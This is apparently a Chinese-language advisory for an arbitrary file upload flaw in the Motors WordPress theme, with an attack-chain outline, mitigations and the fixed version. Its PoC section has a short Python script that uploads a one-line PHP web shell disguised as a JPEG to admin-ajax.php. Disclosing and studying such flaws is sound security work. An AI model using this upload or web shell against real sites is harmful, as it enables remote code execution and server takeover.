CVE-2025-64374 CVSS 9.9 严重

CVE-2025-64374 StylemixThemes Motors主题任意文件上传漏洞

披露日期: 2025-12-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64374

漏洞类型

任意文件上传

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

StylemixThemes Motors WordPress主题

漏洞概述

CVE-2025-64374是StylemixThemes Motors WordPress主题中的一个严重安全漏洞，CVSS评分高达9.9。该漏洞为危险类型文件的无限制上传漏洞，影响Motors主题从某个未指定版本到5.6.81的所有版本。攻击者可以利用此漏洞上传恶意文件到服务器，从而实现远程代码执行。Motors是一款流行的WordPress汽车经销商和车辆销售主题，被广泛应用于汽车销售网站。攻击者通过构造特定的恶意文件上传请求，可以绕过系统的文件类型检查，上传PHP等可执行脚本文件。一旦恶意文件被成功上传并被Web服务器解析执行，攻击者即可获得服务器的完全控制权，包括数据窃取、挂马、植入后门等恶意操作。由于该漏洞无需高权限即可利用（低权限认证），且无需用户交互，因此危害极大，建议所有使用该主题的用户立即升级到最新版本或采取临时防护措施。

技术细节

该漏洞源于Motors主题在处理文件上传时缺少适当的验证和过滤机制。攻击者可以利用WordPress的媒体上传功能或主题特定的上传端点，构造包含恶意代码的文件进行上传。系统未能正确检查上传文件的MIME类型、扩展名和内容，仅依赖客户端的简单检查或完全不检查。攻击者通常将恶意PHP代码伪装成图片或其他合法文件类型上传，成功后会获得一个可访问的URL路径。访问该路径将触发PHP代码执行，从而在服务器上执行任意命令。漏洞的利用需要低权限账号（如订阅者或贡献者角色），这大大降低了攻击门槛。修复版本为5.6.82，建议用户立即升级。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的Motors主题版本

STEP 2

获取上传端点

定位文件上传的AJAX处理程序或媒体上传接口

STEP 3

绕过验证

将恶意PHP代码伪装成图片文件或使用其他绕过技术

STEP 4

上传恶意文件

通过上传接口提交构造的恶意文件

STEP 5

触发执行

访问上传后的文件URL以触发PHP代码执行

STEP 6

获得控制权

在服务器上执行系统命令，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'

# 恶意文件内容
payload = '<?php system($_GET["cmd"]); ?>' 

# 上传端点
upload_url = f'{target}/wp-admin/admin-ajax.php'

files = {
    'file': ('evil.php', payload, 'image/jpeg')
}

data = {
    'action': 'motors_upload_file',
    '_wpnonce': 'attacker_obtained_nonce'
}

response = requests.post(upload_url, files=files, data=data)
print(response.text)

影响范围

StylemixThemes Motors <= 5.6.81

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 禁用Motors主题的文件上传功能；2) 在wp-config.php中添加代码禁止PHP文件执行；3) 使用WAF规则阻止可疑的上传请求；4) 限制上传文件类型为图片、PDF等非可执行格式；5) 监控日志中的异常上传行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表